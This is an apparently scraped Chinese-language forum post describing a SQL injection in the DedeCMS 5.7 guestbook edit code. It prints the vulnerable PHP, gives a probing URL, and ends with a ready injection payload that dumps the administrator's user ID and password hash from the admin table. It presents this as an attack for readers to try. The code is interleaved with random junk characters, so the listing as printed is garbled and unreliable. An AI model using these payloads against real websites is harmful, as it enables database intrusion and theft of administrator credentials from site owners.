dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

9 V8 @/ K! m1 ^) A! Y漏洞文件edit.inc.php具体代码：

< ?php  
% b6 G+ R2 X% v
if(!defined('DEDEINC')) exit('Request Error!');  
$ [0 i0 x! v: G
9 G3 b, {% J# o0 n6 ]   
. d- z7 ~& E6 o+ R
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

else $GUEST_BOOK_POS = "guestbook.php";  

   
) z4 c& K) w$ m( {7 u
$id = intval($id);  

2 t. {0 b& g8 |! y! Z/ |if(empty($job)) $job='view';  

   
3 V) J3 p" w8 O& ~  W
if($job=='del' && $g_isadmin)  
. ^: n9 c9 X3 G( a0 {
{  

3 V5 a6 |1 Q6 @7 p- E3 w7 i1 }  g$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
8 _2 s. `0 S7 v5 u5 g# Y
1 m2 Q* H) ^  \+ D4 RShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

exit();  
4 `, F& n% v- s8 c' x  [" Q- y
$ `6 N5 x1 ^; j, \4 g; K5 Q# T7 ~}  
: F9 |) V- u( l5 j) ?6 L
else if($job=='check' && $g_isadmin)  

8 W$ U, `  H% u' B0 r3 u9 J# |# E9 n1 s{  

8 r9 m$ h. _6 r; S/ }$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  
+ K; E  t# y5 {
* \! K# ~4 l" T, W6 \( l6 Hexit();  

}  
& Y) \+ {; }9 v/ }( Y
else if($job=='editok')  

{  

$ B! J5 O0 @# J# W: I7 M  Y7 B$remsg = trim($remsg);  
, E7 T! |" j; @. G" b2 s5 ~4 ^
; _* \' F2 ^# g9 ^& @! U3 Z6 _1 `; ?if($remsg!='')  

# w$ l1 E$ z$ F9 q: L{  

& E; O" H# d, X& @//管理员回复不过滤HTML By:Errorera blog:errs.cc  

0 T) k- b- o4 D! Y% H. T: E9 eif($g_isadmin)  
  Z  T' u' l6 `
( d  t+ ~! |' B{  
8 G9 |$ O! {9 ?2 r
$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
8 _4 t5 ~* \. |* z2 q. R! n
$ M( c; G  B* z: ^: a) A//$remsg <br /><font color=red>管理员回复：</font> }  
$ @5 y% L$ \9 F
- G0 G  L/ O+ O2 v, velse

{  
' g' a: ?* x' s/ M+ V% u) m1 L
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

* e+ C) _1 v( e$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

6 B7 I6 L/ }1 e  {+ Z. h2 B5 H$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

( j. @8 o+ o6 ^' H. s; S% Y7 e$msg = $oldmsg.$remsg;  
) Z, h- x3 b; q& k2 g
}  
: r7 q; s( m- s" @
}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
7 ~' v+ ?& g! g$ ]+ T9 k. x" y. u
- g, N& p: [, ?$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
9 g- `4 {* s/ `' B7 _0 v
  o) X3 Q0 D8 k1 i$ r: f$ lShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

" D: z$ p" ]6 I* h* texit();  

}  

//home:www.errs.cc  

if($g_isadmin)  
' d2 M! G6 l3 {. A
+ o9 m3 U8 O5 V( @1 l4 Q; v- C{  

6 l  I) [5 z1 V' Z; P$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

1 i6 n1 s4 a9 r5 D: n: trequire_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

# c7 W2 r; a' F4 F, C8 Y0 k" C}  

( d; ^3 B. C  V9 G9 C! \2 Yelse

$ O5 L0 U2 q2 _* M7 W4 o$ f& ~4 m{  

  B4 E4 ?" H! a( [$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  
: p. z: M, p5 y; J
require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  
& p1 w( P0 h0 V* T" X: V- \, n
} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
" h6 I" k1 F) M, k) F3 j. G- C2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞：
7 r- Q2 Y% s! }$ r先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
# g1 C- Z/ u: d: W然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
' _6 l2 r' N: K1 `访问：
9 l  b2 G7 H' I
8 f( u% C: g2 n4 i& e8 U' B: f( B9 C3 Nwww.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
7 v+ r5 t# S0 A  l$ P# r! O
2 T% s: \/ o6 L0 @6 q# r
% q2 a$ b1 {( J2 j明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
4 p  D" [( L& P那么再次访问
3 A, _; O8 J9 e
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

; p3 D" `' i# l8 Q大概利用就是这样，大家有兴趣的多研究下！！

最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='